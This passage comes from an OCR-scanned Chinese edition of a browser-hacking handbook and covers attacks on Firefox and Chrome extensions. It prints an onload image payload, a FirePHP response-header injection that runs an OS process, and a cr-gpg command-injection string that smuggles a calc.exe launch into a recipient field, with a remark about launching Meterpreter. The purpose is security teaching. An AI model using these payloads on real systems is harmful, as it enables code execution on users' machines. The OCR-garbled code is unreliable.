本 来 无 恶意 的 、 带 有 JavaScript onLoad 处 理 程序 的 图 片 被 拖 放 到 特权 区 域 ， 那 处 理 程序 中 的 
JavaScript 代 码 就 会 不 受 限制 地 执行 : 

<img src="http://browserhacker.com/exploit.gif" onload="your_javascript"> 

比如 ,前 面 的 图 片 标签 会 把 图 片 加 载 到 网 页 ， 并 在 非特 权 的 浏览 器 环境 中 执行 onloag 代 码 。 
如 果 受 害 者 将 图 片 拖 放 到 chrome:// 区 域 ， 那么 on1oad 代 码 就 会 再 次 执行 。 但 这 一 次 当 DOM 事 件 
处 理 程 序 运行 onloaq 函 数 时 ， 权 限 会 得 到 提升 。 

Nick Freeman 发 现 了 Firefox 扩 展 ScribeFire “中 的 一 个 非常 类 似 的 漏洞 。 这 个 扩展 允许 用 户 将 
任何 来 源 的 内 容 发 布 到 自己 的 博客 上 。 漏 洞 在 于 用 户 可 能 会 把 图 片 (从 任意 源 ) 拖 放 到 chrome:// 
区 域 。 与 前 面 的 例子 类 似 ，ScribeFire 也 可 以 用 于 在 on1oad 函 数 中 混入 你 的 JavaScript 代 码 ， 然 后 
在 特权 环境 下 执行 。 

利用 DOM 事 件 需要 透彻 理解 扩展 如 何 处 理 用 户 输 入 。 但 归根 结 底 ， 目 标 与 介绍 的 其 他 方法 
都 一 样 ， 就 是 在 chrome:// 区 域 中 执行 任意 JavaScript 代 码 。 


7.8.8 执行 操作 系统 命令 

发 现 XCS 漏 洞 后 ,还 有 可 能 通过 它 执行 任意 操作 系统 命令 。 也 就 是 说 ， 有 可 能 把 你 要 执行 的 
命令 混入 chrome:W 区 域 ， 然 后 就 像 在 命令 行 中 输入 它们 一 样 执行 这 些 命 令 。 不 过 ,在 此 之 前 , 我 
们 先 来 看 看 怎么 在 Firefox 中 局 动 操 作 系统 命令 。 
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在 Firefox 中 远程 执行 命令 的 例子 








如 前 所 述 ， 如 何 利用 目标 扩展 ， 完 全 取决 于 开发 人 员 实 现 它 的 方式 。 扩 展 可 能 使 用 HITTP 首 


部 来 引导 执行 流 ， 而 发 现 它们 也 就 发 现 了 目标 。 


Firefox 的 FirePHP 扩 展会 抓 取 从 服务 器 返回 的 一 些 首部 ， 然 后 根据 它们 决定 在 Firebug 控 制 台 
中 显示 什么 。 如 果 能 够 拦截 服务 器 响应 ， 就 很 容易 知道 首部 中 存在 什么 自 定 义 的 字段 。 以 下 首部 





展示 了 FirePHP 扩 展会 查找 到 的 一 些 HTTP 首 部 : 


HTTP/1.1 200 OK 

Date: Thu, 08 Aug 2013 14:18:44 GMT 

Server: Apache 

Last-Modified: Fri, 29 Mar 2013 22:45:39 GMT 
ETag: "401b9-0-4d91807c0760e" 

Accept-Ranges: bytes 

Content-Length: 0 

Keep-Alive: timeout=15, max=100 

Connection: Keep-Alive 

Content-Type: text/html 





X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2 
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/ 


Library-FirePHPCore/0.3 


X-Wf-1l-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1 


X-Wf-1-1-1-1: 29|["Browser Hacker's Handbook"] | 


可 以 看 到 ， 首 部 中 已 经 插入 了 Browser Hacker's Handbook 字 符 串 。 看 一 看 图 7-18， 会 发 
现 对 话 框 中 包含 了 这 个 字符 串 。 这 个 例子 表明 ， 该 首部 已 经 成 为 这 个 扩展 的 一 个 攻击 面 。 
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What is BeEF? 


BeEF is short for The Brows 
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Amid growing concems about web-bome attacks against 
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xhr = new XMLHttpRequest(); 


ES = 
-» 34e: €; * | Console» | HTML CSS Script DOM Net Cookies 


è Clear Persist Profile All Errors Warnings Info Debug info Co 





>>> xhr = new XMLHttpRequestQ ; xhr.send(); 
xhr .openC" GET" , "http: //browserhacker.com/",true); xhr.sendO; 
P GET http://browserhacker.com/ 2000K 33.98s 
undefined 
Y http://bronserhacker. com/ 
Dump: array('@'=>'Browser Hacker's Handbook") 





Run Clear Copy History 


图 7-18 FirePHP 显 示 来 自 服务 器 的 数据 


下 面 我 们 看 一 看 Eldar Marcussen 发 现 的 一 个 扩展 漏洞 “。 这 个 漏洞 


a) [3-) (&) (>) (Gi) a) 
Fo Variable Viewer Sex | 70% | 90% bot BeEF? 
a ownload Now 


GitHub 加 sourcec DB maing List 








E 
xhr.open("GET" , "http://browserhacker.com/",true); 


Jaz 
p 



















eco 





啊 0.7.1 版 之 前 的 所 有 


FirePHP ， 可 以 从 这 里 下 载 它 : https://addons.mozilla.org/en-US/firefox/addon/firephp/versions, ^ 
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装 它 需 要 使 用 Extension 标 签 页 中 的 Install Add-on From File 选 项 。 
安装 好 这 个 有 漏洞 的 扩展 后 , 接 下 来 要 设置 一 下 环境 。 确 认 Firebug 中 的 Net 标 签 页 是 启用 的 ， 
然后 在 控制 台中 输入 以 下 代码 ， 并 点 击 Run: 


console.log('Exploit FirePHP start') 

xhr = new XMLHttpRequest (); 
xhr.open("GET","http://browserhacker.com/",true); 
xhr.send(); 

console.log('Mouseover FirePHP array to finish') 


这 段 代 码 会 向 http:/browserhackercom 发 送 一 个 XHR 请求， 模拟 对 受害 者 的 一 次 攻击 。 
FirePHP 会 查询 响应 中 的 一 些 关键 首部 ， 以 及 漏洞 所 在 的 位 置 。 我 们 特别 关心 的 是 X-Wf1-1-1-1 
首部 , 解析 它 会 导致 利用 发 生 。 这 个 首部 也 是 我 们 要 在 其 中 放 入 指令 的 地 方 。 如 果 能 正确 地 做 出 
响应 首部 ， 就 可 以 执行 相应 的 操作 系统 命令 。 

为 了 演示 起 见 ， 需 要 通过 代理 拦截 这 个 HTTP 通 信 ， 然 后 在 响应 中 注入 利用 代码 。 就 使 用 你 
常用 的 实时 代理 ， 然 后 添加 FirePHP 的 首部 (以 X-Wf 开 头 ) 即 可 : 


HTTP/1.1 200 OK 

Date: Wed, 07 Aug 2013 00:27:48 GMT 

Server: Apache 

Last-Modified: Fri, 29 Mar 2013 22:45:39 GMT 

ETag: "401b9-0-4d91807c0760e" 

Accept-Ranges: bytes 

Content-Length: 0 

Keep-Alive: timeout=15, max=100 

Connection: Keep-Alive 

Content-Type: text/html 

X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2 
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/ 
Library-FirePHPCore/0.3 

X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1 
X-Wf-1-1-1-1: 476|í("RequestHeaders":("1":"1","2":"2","j3";"j","A";"A","b5":"Db", 
"6"i;"6","7":"7","BO":"Bg","9":"O","UR-sSsCript»var lFile-Components.classes 
[\"@mozilla.org/file/ 

local;1\"].createInstance 
(Components.interfaces.nsILocalFile);lFile.initWithPath 
(\"/Applications/Calculator.app/Contents/MacOS/Calculator\") ;var process- 
Components.classes[\"@mozilla.org/process/util;1\"] 
.CreateInstance(Components.interfaces.nsIProcess);process.init(lFile); 
process.run(true, [1,0);void (0) ;<\/script>": "PWND}} | 


这 次 利用 还 需要 一 步 。 需 要 受害 者 移动 鼠标 到 控制 台中 的 Dump 行 ， 去 触发 Variable Viewer, 
然后 才能 利用 该 浏览 器 扩展 。 这 样 就 会 运行 Calculatorapp， 输 出 如 图 7-19 所 示 。 

在 这 个 例子 中 , 我 们 使 用 一 个 大 数组 向 受害 者 隐藏 了 攻击 代码 ,因此 在 控制 台中 看 不 到 。 另 
外 一 个 好 处 是 这 个 字符 串 占 用 了 较 大 一 块 屏幕 空间 ， 所 以 受用 户 很 可 能 无 意 间 把 鼠标 划 过 它 。 

现在 我 们 已 经 在 OS X 上 利用 了 FirePHP 的 漏洞 。 通 过 更 新 长 度 并 使 用 下 面 的 字符 串 作为 
lFile.initwithPath 调 用 的 参数 ， 也 可 以 在 Windows 上 实现 同样 的 扩展 利用 : 

"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\" 



























































280 第 7 章 攻击 扩展 





BeEF - The Browser Exploitation Framework Project 











What is BeEF? 
BeEF is short for The Brows 
penetration testing tool that f 


Amid growing concems abo 
clients, including mobile clients; 





w GU € > = |7| Console» | HTML CSS Scrip DOM Net Cookies 
console.log('Exploit FirePHP start') 





le Clear Persist Profile All Errors Warnings Info Debuginfo ¢ xhr = new XMLHttpRequest (); 

xhr.open("GET", "http: //browserhacker.com/", true) ; 
xhr.send(); 

console.log('Mouseover FirePHP array to finish') 


>>> console.log('Exploit FirePHP start') xhr = new 
X...onsole.log('Mouseover FirePHP array to finish') 
Exploit FirePHP start 
> GET http://browserhacker.com/ 200 OK 9ms 
Mouseover FirePHP array to finish 
Y http://browserhacker .com/ 

Dump: array('RequestHeaders'=>array('1'=>'1', '2'=>'2', '3'=> ... )) | Run Clear Copy History 











Al7-19 TEOS X 中 利用 FirePHP 


这 个 漏洞 可 以 在 安装 了 Firefox 上 的 任何 操作 系统 上 被 利用 。Firefox 扩 展 中 的 漏洞 在 任何 操作 
系统 中 几乎 都 一 样 容易 被 利用 。 

FirePHP 的 开发 者 已 经 修复 了 该 漏洞 ,补丁 在 这 里 : https:/github.com/firephp/firephp-extension/ 
commit/fccab466cd-5f014c36082d76ae300f2cd612ba51。 代 码 中 存在 多 个 地 方 拼接 攻击 者 控制 的 内 
Jt, 事先 都 未 编码 或 未 经 过 小。 


7.3.4 ”操作 系统 命令 注入 


说 到 服务 器 端 脚本 的 命令 注入 , 应 该 有 不 少 读者 很 熟悉 。 这 时 候 ,， 你 可 以 把 自己 的 数据 加 进 
去 ,服务器 在 通过 参数 使 用 你 的 数据 时 ， 实 际 上 就 会 执行 你 传人 的 命令 。 

常见 的 命令 注入 方法 在 浏览 器 中 也 没什么 不 一 样 。Chrome 扩 展 可 以 通过 使 用 NPAPI, 在 文件 
系统 中 执行 程序 。 如 果 传 递 给 程序 的 参数 来 自 不 受信 任 的 源 ， 比 如 某 个 网 页 ， 就 有 可 能 发 生命 令 
注入 。 

NPAPI 程 序 在 沙 箱 外 部 (在 用 户 环 境 中 ) 执行 。 利 用 Chrome 扩 展 的 这 个 功能 ， 就 可 以 直接 访 
问 操作 系统 。 

操作 系统 命令 注入 的 例子 

Chrome 扩 展 cr-gpg 可 以 利用 一 个 NPAPI 插 件 , 在 Gmail 的 网 页 版 中 启用 电子 邮件 的 PGP 加 密 和 
解密 。 相 应 的 插件 会 调用 安装 在 系统 中 的 gpg 二 进 制 文件 。 以 下 清单 文件 中 声明 的 二 进 制 文件 ， 
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会 在 插件 调用 gpg 时 用 到 : 


"plugins": [ 
("path": "gmailGPG.plugin" }, 
("path": "gmailGPG.dll"), 
("path": "gmailGPG.so") 


ls 

Kotowicz 在 这 个 扩展 的 0.7.4 版 中 ， 发 现 了 一 个 命令 注入 漏洞 “， 这 个 漏洞 是 探索 命令 注入 
漏洞 的 一 个 很 好 的 例子 。 虽 然 这 个 漏洞 存在 于 清单 文件 版 本 1， 但 其 简单 的 原理 同样 适用 于 清单 
文件 版 本 2。 实 际 上 ， 无 论 如 何 ， 这 个 扩展 还 面临 着 同样 攻击 的 危险 。 

首先 ， 要 找到 适当 的 攻击 方法 ， 获 得 对 扩展 的 控制 权 ， 然 后 再 看 一 看 能 对 它 做 什么 。 在 向 受 
害 者 发 送 PGP 加 密 的 电子 邮件 时 ， 他 们 会 解密 邮件 密 文 ， 然 后 网 页 版 Gmail 的 界面 中 才 会 显示 明 
文 。 在 解密 后 的 邮件 出 现时 ， 该 扩展 执行 如 下 代码 ”. 

$($(messageElement).children()[0]).html(tempMessage); 

这 行 代 码 在 http://mail.google.com/ 和 https://mail.google.com/ 源 中 ， 引 入 并 保存 了 一 个 XSS 漏 洞 %。 
换 句 话说 ,命令 注入 发 生 在 扩展 的 内 容 脚 本 中 。 

这 种 漏洞 并 不 存在 于 Web 应 用 中 。 只 有 在 Chrome 浏 览 器 下 的 Gmail 源 中 使 用 cr-gpg 扩 展 , 才能 
利用 这 个 XSS 漏 洞 。 

要 利用 这 个 漏洞 ， 可 以 向 受害 者 发 送 一 个 包含 <script>alert(1)</script> 的 加 密 邮 件 。 
只 要 受害 者 解密 该 密 文 ， 就 会 显示 一 个 内 容 为 数值 1 的 警告 对 话 框 。 

在 这 个 特权 区 ， 可 以 对 Gmail 源 发 起 标准 的 XSS 攻 击 ， 还 可 以 使 用 这 个 内 容 脚 本 ， 来 实施 本 
章 前 几 节 介绍 的 其 他 攻击 。 不 过 , 我 们 还 是 回 过 头 来 看 看 说 好 要 讲 的 命令 注入 漏洞 吧 。 别 急 , 在 
本 节 最 后 把 一 切 都 串 起 来 的 时 候 ， 我 们 会 再 谈 一 谈 XSS 攻 击 。 

cr-gpg 扩 展 调用 NPAPI 插 件 ， 实 现 对 邮件 的 加 密 和 解密 。 这 个 扩展 将 邮件 内 容 及 收 件 人 信息 
传递 给 后 端 处 理 。NPAPI 接 到 信息 ,然后 在 Windows 平 台中 ,使 用 gmailGPG.dll 作 为 接口 ,调用 文 
件 系统 中 的 gpg.exe 二 进 制 文件 。 当 然 ， 操 作 系 统 不 同 ， 命 令 也 就 不 同 。gmailGPG.dll 使 用 的 下 面 
的 C++ 代码 ， 利 用 了 可 执行 文件 gpg.exe”: 

// 针对 已 有 的 收 件 人 列表 加 密 消 息 


FB::variant gmailGPGAPI::encryptMessage(const FB::variant& recipients, 
const FB::variant& msg) 

























































































{ 
string tempFileLocation = m tempPath + "errorMessage.txt"; 
String tempOutputLocation = m tempPath + "outputMessage.txt"; 
string gpgFileLocation = "\""+m_appPath +"gpg.exe\" " 


vector<string> peopleToSendTo = 

recipients.convert cast<vector<string> >(); 

string cmd = "c:\\windows\\system32\\cmd.exe /c " 
cmd.append(gpgFileLocation); 

cmd.append("-e --armor"); 

cmd.append(" --trust-model-always"); 

for (unsigned int i = 0; i « peopleToSendTo.size(); i++) ( 
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cmd.append(" -r"); 
cmd.append (peopleToSendTo.at(i)); 


cmd.append(" --output "); 
cmd.append(tempOutputLocation); 
cmd.append(" 2>"); 
cmd.append(tempFileLocation); 


sendMessageToCommand (cmd,msg.convert cast«string»()); 


<snip> 


j 

这 一 段 代 码 中 包含 命令 注入 漏洞 。 仔 细 看 ， 你 会 发 现 收 件 人 列表 并 未 经 过 过 滤 ， 随 后 就 被 添 
加 到 cmqa 字 符 串 上 。 然 后 ， 操 作 系 统 就 执行 了 cmq 字 符 串 。 结 果 的 命令 行 是 : 

gpg -e --armor --trust-model=always -r <recipient> --output out.txt 2>err.txt 

接 下 来 需要 与 NPAPI 搬 件 通信 ， 以 成 功 发 起 操作 系统 命令 注入 攻击 。 我 们 知道 ， 内 容 脚本 使 
用 消息 与 后 台 页 面 通信 。 后 台 页 面 然后 再 告诉 NPAPI 做 什么 。 最 后 ， 响 应 再 通过 这 个 序列 被 发 回 
到 内 容 脚 本 ， 当 然 顺序 相反 。 
后 台 页 面 " 通 过 指定 MIME 类 型 application/x-gmailgpg 初 始 化 嵌入 插件 对 象 , 这 样 就 可 
以 通过 脚本 语言 访问 它 。 以 下 代码 展示 了 后 台 页 面 是 如 何 实现 这 个 过 程 的 : 

«object id-"plugin0" type="application/x-gmailgpg"></object><br /> 

Doc - false; 


function pluginO() 


{ 












































return document.getElementById('plugin0'); 





var testSettings = function()( 


chrome.extension.onRequest.addListener( 
function(request, sender, sendResponse) 
var gpgPath - localStorage['gpgPath']; 
var tempPath - localStorage['tempPath' 
if(!gpgPath)( 
gpgPath = '/opt/local/bin/'; 
4 
if(!tempPath)( 
tempPath - '/tmp/'; 


{ 


1; 


pi 
plugin0O().appPath = gpgPath; 
plugin0O().tempPath = tempPath; 
if (request.messageType == 'encrypt') { 
var mailList = request.encrypt.maillist; 
if( localStorage["useAutoInclude"] && 
localStorage["useAutoInclude"] != 'false') { 
mailList.push(localStorage["personaladdress"]); 
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j 
var mailMessage - request.encrypt.message; 
sendResponse((message: plugin0().encrypt (mailList,mailMessage), 
domid:request.encrypt.domel)); 
)else if(request.messageType == 'sign')( 


这 段 代码 还 在 后 台 页 面 中 添加 了 监听 器 ， 将 由 内 容 脚 本 传人 消息 时 使 用 。 这 里 要 注意 的 是 
encrypt 消 息 类 型 ， 因 为 它 是 向 NPAPI 搬 件 注入 代码 的 关键 。 
变量 mailList 未 经 任何 过 滤 就 被 传递 给 了 插件 。 这 样 你 就 拥有 了 一 条 从 加 密 内 容 到 NPAPI 
插件 调用 再 到 操作 系统 的 攻击 路 径 。 
不 过 , 最 后 还 有 个 小 问题 。 这 里 使 用 两 个 不 同 的 加 密 函 数 名 : 其 中 一 个 是 sncrypt， 另 一 个 
是 encryptMessage。gmailGPGAPI.cpp 文 件 中 有 一 个 映射 ,告诉 插件 应 该 与 JavaScript 共 享 哪 一 
个 函数 : 


gmailGPGAPI::gmailGPGAPI(const gmailGPGPtr& plugin, 
const FB::BrowserHostPtr& host) : m plugin(plugin), m host(host) 

{ 
registerMethod("enerypt", make method(this, &gmailGPGAPI::encryptMessage)); 
registerMethod("decrypt", make method(this, &gmailGPGAPI::decryptMessage)); 


下 面 我 们 把 这 些 都 串 在 一 起 , 发 起 一 次 命令 注入 攻击 。 以 下 代码 改编 自 一 个 公开 披露 的 利用 ”: 


windows_command ='%SystemRoot%\\system32\\calc.exe'; 
linux_command ='touch /tmp/bhh'; 
command = windows_command; 
































if (navigator.platform.indexOf('Win') !== -1) { 
var nul - "nul"; 
var cmdsep - '&'; 
var cmdpref - " start /min "; 
} else { 
var nul = "/dev/null"; 


var cmdsep = ';'; 
var cmdpref = ""; 


he 


chrome.extension.sendRequest ( { 
'messageType':'encrypt',encrypt:í( 
'message':'Brower Hacker's Handbook', 
'domel':'', 
'maillist':['wadeGbrowserhacker.com --no-auto-key-locate »' + 
nul + cmdsep + cmdpref + 
command + cmdsep + 'echo ' 


Es 

把 这 段 代码 加 密 并 发 送 给 目标 之 后 ， 只 要 使 用 cr-gpg 扩 展 解密 就 会 执行 。 本 节 前 面 探讨 了 一 
个 基本 的 XSS 攻 击 。 这 里 稍 加 扩展 ,将 要 注入 的 内 容 放 到 内 容 脚 本 中 ,然后 不 动 声色 地 传递 给 后 
台 页 面 ， 最 终 传递 给 NPAPI 插 件 。 于 是 就 会 调用 如 下 操作 系统 命令 : 
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gpg -e --armor --trust-model=always -r wade@browserhacker.com 
--no-auto-key-locate >nul& start /min %SystemRoot%\system32\calc. 
exe&echo --output out.txt 2>err.txt 


这 个 命令 会 因为 脚本 执行 而 执行 。 当 然 ， 这 里 启动 的 是 calc.exe， 用 户 会 看 到 。 你 想 执行 什 
么 ， 可 以 自己 任意 修改 。 比 如 ， 启 动 Meterpreter， 并 在 用 户 不 注意 的 情况 下 回 连 到 你 的 服务 器 。 

这 个 漏洞 在 被 报告 给 厂商 后 ， 迅 速 被 修复 了 。 功 能 由 调用 操作 系统 改 为 调用 更 安全 的 
libgpgme API。 这 一 修改 让 这 类 攻击 彻底 没有 了 机 会 。 

这 里 介绍 的 cr-gpg 的 漏洞 涉及 扩展 与 插件 的 一 些 交 叉 地 带 ， 展 示 了 如 何 通 过 命令 注 人 利用 
Chrome 扩 展 ， 执 行 任意 可 执行 文件 。 相 信 读 者 也 可 以 利用 相同 的 方法 ， 去 寻找 其 他 扩展 中 的 类 
似 漏洞 。 









































7.4 小 结 


把 功能 从 浏览 器 核心 转移 到 扩展 中 ,确实 能 够 防止 浏览 器 体积 过 大 。 但 是 ,这 样 一 来 也 就 把 
一 些 重 要 功能 的 开发 和 维护 ， 交 到 了 安全 意识 没有 那么 强 的 一 些 开发 者 手中 。 安 全 意识 差 , 同时 
还 被 赋予 了 较 高 权限 ， 就 导致 很 多 扩展 出 现 了 安全 问题 。 有 人 认为 ,浏览 器 本 身 没有 过 于 膨胀 的 
代价 是 整体 安全 性 降低 了 。 

对 于 扩展 如 何 增强 浏览 器 体验 ,可 以 从 多 个 角度 去 看 待 。 有 时 候 , 或 许 把 扩展 看 成 每 个 页 面 
都 会 运行 的 一 种 虚拟 的 Web 应 用 更 合适 。 而 另 一 时 候 ， 或 许可 以 把 它们 看 成 安装 在 操作 系统 中 的 
应 用 。 无 论 如 何 ， 都 应 该 知道 它们 会 在 特权 环境 下 运行 ， 并 且 有 权 访问 特权 API。 

本 童 分 析 了 浏览 絮 扩 展 的 构成 , 以 及 如 何 检测 勾 连 浏览 锅 是 否 安装 了 你 想 攻击 的 扩展 。 我们 
探讨 了 多 个 扩展 攻击 面 ， 以 及 不 同 的 漏洞 类 别 。 通 过 学 习 ,， 掌握 了 跨 上 下 文 脚本 攻击 的 原理 ， 以 
及 扩大 权限 的 一 些 可 靠 方法 。 

总 之 , 这 一 章 全 面 讨论 了 利用 Chrome 和 Firefox 扩 展 的 复杂 技术 。 下 一 章 会 深入 研究 浏览 如 插 
件 。 插 件 是 增强 浏览 器 体验 的 另 一 种 流行 的 方式 ， 同 样 也 有 着 可 观 的 攻击 面 。 



























































7.5 问题 


(1) 比较 一 下 Chrome 和 Firefox 浏 览 器 的 扩展 安全 模型 有 何 异 同 。 
(2) 采集 扩展 指纹 的 有 效 方法 有 哪些 ? 

(3) 什么 是 chrome:// 区 域 ? 为 什么 这 个 区 域 很 重要 ? 

(4) CSP 如 何 应 用 于 浏览 器 扩展 ? 

(5) SOP 如 何 应 用 于 浏览 器 扩展 ? 

(6) 如 何在 Firefox 扩 展 中 执行 操作 系统 命令 ? 

(7) 如 何在 Chrome 扩 展 中 执行 操作 系统 命令 ? 

(8) 内 容 脚 本 拥有 什么 特权 ? 

(9) 后 台 页 面 拥有 什么 特权 ? 
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(10) Firefox 扩 展 拥有 什么 特权 ? 
要 查看 问题 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 











http:/www.wiley.com/go/browserhackershandbook。 
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虽然 浏览 器 主要 负责 演 染 网 页 , 但 总 有 很 多 情况 需要 播放 影片 或 与 三 维 模型 交互 。 而 要 具备 
这 些 能 力 ， 甚 至 需要 集成 其 他 应 用 或 编程 语言 ， 比 如 Microsoft Excel 或 Java， 才 能 具备 富 交 互 内 
容 与 特性 。 这 些 额 外 的 功能 并 不 一 定 是 浏览 器 开发 商 希 望 原生 支持 的 ,因此 他 们 会 提供 一 种 方式 ， 
供应 用 开发 者 通过 插件 接口 来 实现 这 些 功能 。 
插件 接口 将 外 部 代码 或 应 用 绑 定 到 浏览 器 ,从 而 利用 这 些 第 三 方 插件 执行 更 多 任务 。 与 任何 
应 用 一 样 ， 代 码 中 存在 的 缺陷 会 导致 信息 泄露 、 代 码 执行 ， 以 及 其 他 非 预 期 的 行为 。 

这 一 章 ， 我 们 会 介绍 如 何 识 别 Acrobat Reader, 、Java 和 Flash 等 插件 。 识 别 插件 后 ， 就 可 以 利 
用 这 些 插件 的 已 知 漏洞 , 绕 开 浏 览 器 的 防御 机 制 。 最 后 ,我们 会 讨论 在 利用 插件 攻击 浏览 器 的 基 
础 上 更 进一步 ， 即 攻击 操作 系统 的 技术 。 


8.1 理解 插件 


接 下 来 几 节 会 介绍 什么 是 插件 , 插件 与 扩展 有 什么 区 别 ， 以 及 插件 与 用 户 的 交互 方式 。 通 过 
深入 理解 这 些 概念 ,可 以 建立 对 插件 进行 指纹 采集 和 攻击 的 基础 , 继而 也 就 能 更 好 地 理解 插件 对 
安全 的 影响 有 多 大 。 
插件 是 连接 浏览 器 和 外 部 代码 库 或 应 用 的 一 座 桥 梁 。 安 装 插件 后 ， 会 有 新 代码 进入 浏览 器 。 
这 些 代 码 能 够 把 外 部 应 用 链接 到 浏览 莫 ， 从 而 让 浏览 器 能 够 访问 外 部 应 用 中 的 代码 。 提 供 插 件 接 
口 ， 以 便 在 浏览 器 内 部 支持 那些 原先 只 有 外 部 应 用 支持 的 文件 格式 , 极 大 增强 了 浏览 器 自身 的 处 
理 能 力 。 
插件 由 两 部 分 组 成 : 浏览 器 API 和 脚本 API。 浏览 器 API 控 制 浏 览 器 与 外 部 代码 的 交互 ， 以 实 
现 演 染 新 类 型 的 内 容 。 比 如 , 可 以 让 浏览 器 利用 Adoble Reader 的 代码 , 在 浏览 锅 中 显示 PDF 文件 。 
这 些 搬 件 通常 都 使 用 标准 的 API， 比 如 ActiveX ( Windows ) 或 跨 平台 的 Netscape API (NPAPI )。 

脚本 API 允 许 浏 览 器 内 部 的 代表 插件 的 对 象 可 以 通过 Web API 来 操纵 ， 通 常 使 用 JavaScript。 
这 两 个 API 合 起 来 可 以 供 Web 开 发 者 显示 内 容 、 操 作 内 容 ， 并 向 用 户 展示 内 容 ， 而 且 内 容 既 能 做 
到 格式 美观 ， 还 具有 功能 性 。 

Chrome 也 人 允许 播 件 在 独立 的 进程 空间 中 运行 ， 保 证 插件 骨 溃 不 会 导致 浏览 器 整体 骨 溃 。 当 
然 , 这 个 机 制 也 限制 了 有 问题 的 插件 干扰 浏览 器 正常 运行 。 不 过 , 虽然 插件 运行 在 独立 的 进程 中 ， 
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也 不 是 不 能 被 利用 ， 而 且 在 某 些 情况 下 ， 不 仅 能 通过 它们 访问 浏览 器 ， 还 能 访问 底层 操作 系统 。 
我 们 在 攻击 浏览 器 时 ,经 常会 看 到 这 些 类 型 的 插件 ,包括 Flash、Acrobat、Java、QuickTime、 
Silverlight 、RealPlayer 和 和 VLC 等 。 这 些 插件 支持 PDF 、Java 小 程序 、 影 片 和 高 级 图 形 处 理 能 
是 与 它们 各 自 的 父 程序 一 道 安 装 的 。 
在 Firefox 中 打开 Add-ons Manager， 选 择 Plugins 标 签 ， 如 图 8-1 所 示 ， 可 以 看 到 Firefox 中 已 经 
安装 了 哪些 插件 。Chrome 、IE 及 其 他 浏览 器 中 也 差不多 ， 只 不 过 有 些 选项 的 名 字 不 同 而 已 。 
$ Add-ons Manager ES | 


EI 





€ Google Talk Plugin Video Accelerator 0.1.44.29 





Google Talk Plugin Video Accelerator version:0.1.44.29 More 





€ Google Talk Plugin Video Renderer 4.5.2.14837 
Version 4.5.2.14837 More 


iPhotoPhotocast 7.0 
© iphoto6 More 








图 8-1 Firefox Plugins 控 制 面板 显示 已 安装 的 插件 


8.1.1 插件 与 扩展 的 区 别 


从 扩展 浏览 器 功能 这 个 角度 看 ， 插 件 和 扩展 是 类 似 的 。 它 们 的 区 别 主要 在 于 ， 扩 展 是 通过 
JavaScript 和 其 他 API 利 用 已 有 的 浏览 器 接口 来 增加 功能 ， 而 插件 利用 的 是 外 部 代码 。 

扩展 通常 在 多 个 页 面 中 都 是 有 效 的 , 因为 它们 从 整体 上 扩展 了 浏览 器 的 功能 。 而 插件 则 是 为 
特定 的 文件 格式 设计 的 。 只 有 当 浏览 器 遇 到 特定 文件 格式 时 , 才 会 用 到 插件 ， 比 如 相应 的 文件 通 
过 <object> 或 <embed> 标 签 被 脱 入 网 页 ， 或 者 浏览 器 接收 到 了 特定 的 文件 。Content-type 引 用 一 
个 MIME 类 型 ， 表 示 浏 览 器 应 用 如 何 处 理 这 种 文件 。 

8-2 展 示 了 通过 cur1 请 求 的 一 个 PDF 文 件 的 Content-type 首 部 。 响应 中 包含 的 Content-type 值 
{application/pdf o Ñ Ui ah Ei Six URLHJ], E65 http://media.blackhat.com/bh-us-12/ 
Briefings/ Ocepek/BH US 12 Ocepek Linn BeEF MITM WPpdf， 它 就 知道 要 用 Adobe Acrobat 插 
件 ， 因 为 Acrobat 已 经 将 自己 注册 为 这 种 MIME 类 型 的 处 理 程序 。 
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fit antisnatchor 一 bash — 87x31 

Last login: Sun Dec 8 12: 02: 32 on ttys@01 
antisnachorspro:~ antisnatchor$ curl -svi http://media.blackhat.com/bh-us-12/Briefings/ 
Ocepek/BH US, 12 Ocepek Linn, BeEF, MITM WP.pdf > /dev/null 
* Adding handle: conn: 0x7fa879804000 
* Adding handle: send: 0 
* Adding handle: recv: 9 
* Curl addHandleToPipeline: length: 1 
* - Conn 0 (0x7fa879804000) send pipe: 1, recv pipe: 0 
* About to connect() to media.blackhat.com port 80 (#0) 
* Trying 63.236.103.241. 

* Connected to media. blackhat. com (63.236.103.241) port 80 (#0) 
» GET /bh-us-12/Briefings/Ocepek/BH US 12 Ocepek Linn BeEF MITM WP.pdf HTTP/1.1 
» User-Agent: curl/7.30.0 
» Host: media.blackhat.com 
> Accept: */* 
> 
< HTTP/1.1 200 OK 
* Server publicfile is not blacklisted 
« Server: publicfile 
« Date: Sun, 08 Dec 2013 07:13:27 GMT 
« Last-Modified: Sun, 22 Jul 2012 21:30:07 GMT 
« Content-Type: application/pdf 
« Transfer-Encoding: chunked 


< 

{ [data not shown] 

* Connection #0 to host media.blackhat.com left intact 
antisnachorspro:~ antisnatchor$ fl 





图 8-2 ”通过 curl 访 问 PDF 文 件 时 的 内 容 类 型 为 application/pdf 





8.1.2 插件 与 标准 程序 的 区 别 


插件 与 标准 程序 的 区 别 在 于 , 它们 独立 地 扩展 浏览 器 功能 。 插件 通 常会 与 外 部 应 用 调用 相同 
的 代码 。 正 因为 如 此 ， 如 果 应 用 中 存在 漏洞 ， 那 么 相应 的 插件 中 也 经 常会 存在 漏洞 。 换 名 话说 ， 
如 果 Adobe Acrobat 的 某 个 程序 库 中 有 漏洞 , 那么 该 漏洞 可 能 既 可 以 从 外 部 应 用 中 调用 , 也 可 以 在 
浏览 器 中 调用 。 

插件 拥有 的 切 能 能 会 少 一 些 ， 或 者 说 与 完整 的 应 用 相 比 ， 它 的 功能 会 被 减少 一 些 。 因 此 ， 
可 能 IES FRCTOR, 然后 EO AE E 

一 般 来 说 ， 当 应 用 更 新 时 ， 如 果 搬 件 与 外 部 应 用 关联 着 ， 那么 插件 也 会 更 新 。 如 果 此 时 浏览 
器 正 处 于 打开 状态 ,那么 就 需要 重新 启动 才能 使 用 更 新 后 的 插件 。 因为 它们 共享 相同 的 基础 代码 ， 
